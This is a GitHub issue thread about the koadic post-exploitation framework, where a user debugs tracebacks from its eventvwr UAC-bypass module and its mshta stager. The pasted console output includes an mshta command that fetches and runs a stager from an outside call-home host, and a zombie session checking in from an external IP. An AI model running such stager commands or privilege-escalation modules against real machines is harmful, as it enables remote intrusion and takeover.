### ISSUE TITLE
zombie died when try to elevate

### ISSUE THREAD

**Issue by youssrii** [zerosum0x0/koadic#117]
(koadic: imp/ele/bypassuac_eventvwr)# run
Traceback (most recent call last):
  File "/root/koadic/core/shell.py", line 58, in run
    self.run_command(cmd)
  File "/root/koadic/core/shell.py", line 91, in run_command
    self.actions[action].execute(self, cmd)
  File "core/commands/run.py", line 12, in execute
    env.run()
  File "modules/implant/elevate/bypassuac_eventvwr.py", line 48, in run
    self.dispatch(workloads, self.job)
  File "/root/koadic/core/plugin.py", line 59, in dispatch
    j = job(self.shell, session.id, self.STATE, workload, options)
  File "/root/koadic/core/job.py", line 42, in __init__
    if self.create() != False:
  File "modules/implant/elevate/bypassuac_eventvwr.py", line 10, in create
    if (int(self.session.build) < 7600 or int(self.session.build) > 15030) and self.options.get("IGNOREBUILD") == "false":
ValueError: invalid literal for int() with base 10: ''

(koadic: imp/ele/bypassuac_eventvwr)# zombies 

        ID   IP              STATUS  LAST SEEN       
        ---  ---------       ------- ------------    
        0    85.18.74.54     Dead    2019-10-26 01:18:21
        1    85.18.74.54     Dead    2019-10-26 01:23:15
        2    85.18.74.54     Dead    2019-10-26 01:25:19

**Comment by TheNaterz** [comment]
Your Zombies aren't dying when you're trying to elevate, you've actually never had a live zombie. session.build only populates once the Zombie is staged and since you're getting an invalid literal int() error on session.build, then that means the Zombie has never staged. I can add a fix so that this exception doesn't get thrown, but I'm not going to be able to help you on specifically why your Zombie isn't staging, you're gonna need to figure that one out and tweak accordingly.

**Comment by youssrii** [comment]
is it stable (zombie) over wan?

**Comment by TheNaterz** [comment]
Yes, wan o lan.

**Comment by youssrii** [comment]
(koadic: sta/js/mshta)# info 

        NAME       VALUE               REQ     DESCRIPTION     
        -----      ------------        ----    -------------   
        SRVHOST    192.168.1.3         yes     Where the stager should call home
        SRVPORT    9999                yes     The port to listen for stagers on
        EXPIRES                        no      MM/DD/YYYY to stop calling home
        KEYPATH                        no      Private key for TLS communications
        CERTPATH                       no      Certificate for TLS communications
        MODULE                         no      Module to run once zombie is staged
        ONESHOT    false               yes     oneshot         

(koadic: sta/js/mshta)# set SRVHOST bananafish.hopto.org
[+] SRVHOST => bananafish.hopto.org
(koadic: sta/js/mshta)# set SRVPORT 443
[+] SRVPORT => 443
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://bananafish.hopto.org:443/EiOhQ
[!] Don't edit this URL! (See: 'help portfwd')
[>] mshta http://bananafish.hopto.org:443/EiOhQ
[+] Zombie 0: Staging new connection (85.18.74.54)
(koadic: sta/js/mshta)# ----------------------------------------
Exception happened during processing of request from ('85.18.74.54', 60149)
Traceback (most recent call last):
  File "/usr/lib/python3.7/socketserver.py", line 650, in process_request_thread
    self.finish_request(request, client_address)
  File "/usr/lib/python3.7/socketserver.py", line 360, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python3.7/socketserver.py", line 720, in __init__
    self.handle()
  File "/root/koadic/core/handler.py", line 90, in handle
    return BaseHTTPRequestHandler.handle(self)
  File "/usr/lib/python3.7/http/server.py", line 426, in handle
    self.handle_one_request()
  File "/usr/lib/python3.7/http/server.py", line 414, in handle_one_request
    method()
  File "/root/koadic/core/handler.py", line 175, in do_GET
    return self.handle_new_session()
  File "/root/koadic/core/handler.py", line 260, in handle_new_session
    data = self.post_process_script(self.options.get("_STAGE_"), template)
  File "/root/koadic/core/handler.py", line 606, in post_process_script
    from rjsmin import jsmin
ModuleNotFoundError: No module named 'rjsmin'
----------------------------------------

(koadic: sta/js/mshta)# zombies 

        ID   IP              STATUS  LAST SEEN       
        ---  ---------       ------- ------------    
        0    85.18.74.54     Alive   2019-10-26 01:51:53

Use "zombies ID" for detailed information about a session.
Use "zombies IP" for sessions on a particular host.
Use "zombies DOMAIN" for sessions on a particular Windows domain.
Use "zombies killed" for sessions that have been manually killed.

**Comment by youssrii** [comment]
why i get those errors when the session established?
